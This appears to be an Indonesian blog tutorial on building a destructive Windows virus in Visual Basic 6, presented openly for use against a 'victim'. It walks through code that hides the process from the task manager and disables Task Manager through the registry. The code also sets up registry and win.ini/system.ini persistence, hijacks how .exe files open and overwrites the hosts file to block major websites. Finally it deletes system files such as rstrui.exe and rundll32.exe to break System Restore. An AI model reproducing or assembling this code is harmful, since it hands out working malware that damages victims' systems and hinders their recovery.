dan ingin tahu cara memanfaatkan visual basic sebagai virus maker?
kali ini saya akan memberitahu tutorial untuk membuatnya...
pertama,cari dulu visual basic 6.0
pertama buat code dasarnya,yaitu,menyembunyikan virus ini setelah di klik.
Private Sub Form_Load()
On Error Resume Next
perintah ini adalah perintah untuk membuat virus tetap berjalan walaupun komputer atau sistem sedang error.
Hide
perintah ini berfungsi untuk menyembunyikan virus dari korban,walaupun setingan hiddennya telah di buat visible
True
App.TaskVisible = False
ini lebih baik,perintah ini membuat virus tidak terlihat di task manager
End Sub
jadi codenya jadi seperti ini:
------------------------------------
Private Sub Form_Load()
On Error Resume Next
Hide
True
App.TaskVisible = False
End Sub
-----------------------------------
sekarang akan saya berikan script untuk disable cmd
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", vbHide
lalu tambahkan
Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
Shell "REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f", vbHide
ganti ###Letter/Symbol/Number### menjadi ?
sehingga saat virus ini di lihat,yang muncul hanya ??????
setelah itu tambahkan
FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & "\" & App.EXEName & ".EXE", "c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe" & intResult & ".exe"
ganti "int" menjadi "1"
ini script penutup
Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Open "c:\WINDOWS\win.ini" For Output As #1
Print #1, "Load = C:\Program Files\Virus1.exe"
Print #1, "run = C:\Program Files\Virus2.exe"
Close #1
Open "c:\WINDOWS\system.ini" For Output As #1
Print #1, "Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe"
Print #1, "Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe"
Close #1
ini adalah script yang membuat si korban lebih sengsara
Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "208.65.153.251 208.65.153.251 "
Print #1, "208.65.153.251 www.google.com"
Print #1, "208.65.153.251 www.google.co.uk"
Print #1, "208.65.153.251 www.yahoo.com"
Print #1, "208.65.153.251 www.yahoo.co.uk"
Print #1, "208.65.153.251 www.askjeeves.com"
Print #1, "208.65.153.251 www.altavista.com"
Print #1, "208.65.153.251 www.alltheweb.com"
Print #1, "208.65.153.251 www.msn.com"
Print #1, "208.65.153.251 www.hotmail.com"
Print #1, "208.65.153.251 www.myspace.com"
Print #1, "208.65.153.251 www.plunder.com"
Print #1, "208.65.153.251 www.quicksharing.com"
Print #1, "208.65.153.251 www.myspace.com"
Close #1
script ini membuat korban tidak dapat membuka situs yang terdaftar di atas
dan ini terakhir
Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
script ini akan mendisable system restore
compile lalu jalankan, dijamin maknyus
Atom Feed (xml)